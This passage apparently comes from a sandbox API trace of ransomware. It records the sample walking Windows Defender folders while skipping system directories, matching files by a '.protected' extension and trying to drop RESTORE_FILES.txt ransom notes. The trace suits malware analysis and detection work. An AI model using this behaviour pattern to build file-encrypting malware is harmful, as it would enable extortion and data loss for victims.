returned -1 [0093.262] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.262] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.262] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.262] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\..") returned 52 [0093.262] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.262] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.262] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.262] lstrcmpiW (lpString1="Definition Updates", lpString2="Windows") returned -1 [0093.262] lstrcmpiW (lpString1="Definition Updates", lpString2="Program Files") returned -1 [0093.262] lstrcmpiW (lpString1="Definition Updates", lpString2="Program Files (x86)") returned -1 [0093.262] lstrcmpiW (lpString1="Definition Updates", lpString2="$Recycle.bin") returned 1 [0093.262] lstrcmpiW (lpString1="Definition Updates", lpString2="System Volume Information") returned -1 [0093.262] 
wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates") returned 68 [0093.262] lstrcmpW (lpString1="Definition Updates", lpString2=".") returned 1 [0093.262] lstrcmpW (lpString1="Definition Updates", lpString2="..") returned 1 [0093.263] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*") returned 70 [0093.263] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.263] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.263] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.263] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.263] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.263] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.263] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\.") returned 70 [0093.263] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.263] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.263] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.263] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.263] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.263] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.263] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.263] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Windows Defender\\Definition Updates\\..") returned 71 [0093.263] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.263] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.263] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.264] lstrcmpiW (lpString1="Backup", lpString2="Windows") returned -1 [0093.264] lstrcmpiW (lpString1="Backup", lpString2="Program Files") returned -1 [0093.264] lstrcmpiW (lpString1="Backup", lpString2="Program Files (x86)") returned -1 [0093.264] lstrcmpiW (lpString1="Backup", lpString2="$Recycle.bin") returned 1 [0093.264] lstrcmpiW (lpString1="Backup", lpString2="System Volume Information") returned -1 [0093.264] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned 75 [0093.264] lstrcmpW (lpString1="Backup", lpString2=".") returned 1 [0093.264] lstrcmpW (lpString1="Backup", lpString2="..") returned 1 [0093.264] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*") returned 77 [0093.264] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.264] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.264] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.264] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.264] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.264] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.264] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows 
Defender\\Definition Updates\\Backup\\.") returned 77 [0093.264] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.264] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.264] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.264] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.264] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.264] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.264] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.264] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\..") returned 78 [0093.264] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.264] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.264] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.264] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.264] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.264] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.265] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.265] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.265] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\RESTORE_FILES.txt") returned 93 [0093.265] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.265] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.265] FindNextFileW (in: hFindFile=0x47ba50, 
lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.265] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.265] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\RESTORE_FILES.txt") returned 93 [0093.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\backup\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.265] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.265] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.265] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.265] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.265] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.265] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.265] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\RESTORE_FILES.txt") returned 86 [0093.265] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.265] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.265] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.265] lstrcmpiW (lpString1="Updates", lpString2="Windows") returned -1 [0093.265] lstrcmpiW (lpString1="Updates", 
lpString2="Program Files") returned 1 [0093.265] lstrcmpiW (lpString1="Updates", lpString2="Program Files (x86)") returned 1 [0093.265] lstrcmpiW (lpString1="Updates", lpString2="$Recycle.bin") returned 1 [0093.265] lstrcmpiW (lpString1="Updates", lpString2="System Volume Information") returned 1 [0093.265] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned 76 [0093.265] lstrcmpW (lpString1="Updates", lpString2=".") returned 1 [0093.265] lstrcmpW (lpString1="Updates", lpString2="..") returned 1 [0093.265] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*") returned 78 [0093.265] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.265] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.265] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.265] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.265] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.266] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.266] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\.") returned 78 [0093.266] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.266] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.266] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.266] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.266] lstrcmpiW (lpString1="..", 
lpString2="Program Files (x86)") returned -1 [0093.266] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.266] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.266] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\..") returned 79 [0093.266] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.266] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.266] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.266] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.266] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.266] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.266] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.266] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.266] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\RESTORE_FILES.txt") returned 94 [0093.266] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.266] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.266] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.266] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.266] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\RESTORE_FILES.txt") returned 94 [0093.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\updates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.266] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.266] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="Windows") returned -1 [0093.266] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="Program Files") returned -1 [0093.266] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="Program Files (x86)") returned -1 [0093.267] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="$Recycle.bin") returned 1 [0093.267] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="System Volume Information") returned -1 [0093.267] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned 107 [0093.267] lstrcmpW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2=".") returned 1 [0093.267] lstrcmpW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="..") returned 1 [0093.267] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*") returned 109 [0093.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.267] lstrcmpiW (lpString1=".", 
lpString2="Windows") returned -1 [0093.267] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.267] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.267] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.267] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.267] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\.") returned 109 [0093.267] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.267] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.267] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.267] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.267] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.267] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.267] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.267] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\..") returned 110 [0093.267] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.267] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.267] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.267] lstrcmpiW (lpString1="mpasbase.vdm.protected", lpString2="Windows") returned -1 [0093.267] lstrcmpiW (lpString1="mpasbase.vdm.protected", lpString2="Program Files") returned -1 [0093.267] lstrcmpiW (lpString1="mpasbase.vdm.protected", lpString2="Program Files (x86)") returned -1 [0093.267] lstrcmpiW (lpString1="mpasbase.vdm.protected", 
lpString2="$Recycle.bin") returned 1 [0093.267] lstrcmpiW (lpString1="mpasbase.vdm.protected", lpString2="System Volume Information") returned -1 [0093.267] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.protected") returned 130 [0093.267] StrStrIW (lpFirst="mpasbase.vdm.protected", lpSrch=".protected") returned=".protected" [0093.267] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.267] lstrcmpiW (lpString1="mpasdlta.vdm.protected", lpString2="Windows") returned -1 [0093.267] lstrcmpiW (lpString1="mpasdlta.vdm.protected", lpString2="Program Files") returned -1 [0093.267] lstrcmpiW (lpString1="mpasdlta.vdm.protected", lpString2="Program Files (x86)") returned -1 [0093.267] lstrcmpiW (lpString1="mpasdlta.vdm.protected", lpString2="$Recycle.bin") returned 1 [0093.267] lstrcmpiW (lpString1="mpasdlta.vdm.protected", lpString2="System Volume Information") returned -1 [0093.268] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.protected") returned 130 [0093.268] StrStrIW (lpFirst="mpasdlta.vdm.protected", lpSrch=".protected") returned=".protected" [0093.268] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.268] lstrcmpiW (lpString1="mpengine.dll.protected", lpString2="Windows") returned -1 [0093.268] lstrcmpiW (lpString1="mpengine.dll.protected", lpString2="Program Files") returned -1 [0093.268] lstrcmpiW (lpString1="mpengine.dll.protected", lpString2="Program Files (x86)") returned -1 [0093.268] lstrcmpiW (lpString1="mpengine.dll.protected", lpString2="$Recycle.bin") returned 1 [0093.268] lstrcmpiW 
(lpString1="mpengine.dll.protected", lpString2="System Volume Information") returned -1 [0093.268] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll.protected") returned 130 [0093.268] StrStrIW (lpFirst="mpengine.dll.protected", lpSrch=".protected") returned=".protected" [0093.268] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.268] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.268] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.268] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.268] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.268] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.268] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\RESTORE_FILES.txt") returned 125 [0093.268] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.268] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.268] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.268] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.268] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\RESTORE_FILES.txt") returned 125 [0093.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition 
Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.268] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.268] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.269] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\RESTORE_FILES.txt") returned 86 [0093.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.269] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.269] lstrcmpiW (lpString1="LocalCopy", lpString2="Windows") returned -1 [0093.269] lstrcmpiW (lpString1="LocalCopy", lpString2="Program Files") returned -1 [0093.269] lstrcmpiW (lpString1="LocalCopy", lpString2="Program Files (x86)") returned -1 [0093.269] lstrcmpiW (lpString1="LocalCopy", lpString2="$Recycle.bin") returned 1 [0093.269] lstrcmpiW (lpString1="LocalCopy", lpString2="System Volume Information") returned -1 [0093.269] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy") returned 59 [0093.269] lstrcmpW (lpString1="LocalCopy", lpString2=".") returned 1 [0093.269] lstrcmpW 
(lpString1="LocalCopy", lpString2="..") returned 1 [0093.269] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*") returned 61 [0093.269] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.269] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.269] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.269] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.269] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.269] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.270] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\.") returned 61 [0093.270] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.270] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.270] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.270] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.270] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.270] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.270] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.270] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\..") returned 62 [0093.270] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.270] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.270] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.270] 
lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.270] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.270] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.270] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.270] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.270] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\RESTORE_FILES.txt") returned 77 [0093.270] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.270] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.270] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.270] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.271] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\RESTORE_FILES.txt") returned 77 [0093.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\localcopy\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.271] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.271] lstrcmpiW (lpString1="Quarantine", lpString2="Windows") returned -1 [0093.271] lstrcmpiW (lpString1="Quarantine", lpString2="Program Files") returned 1 [0093.271] lstrcmpiW (lpString1="Quarantine", lpString2="Program Files (x86)") returned 1 [0093.271] 
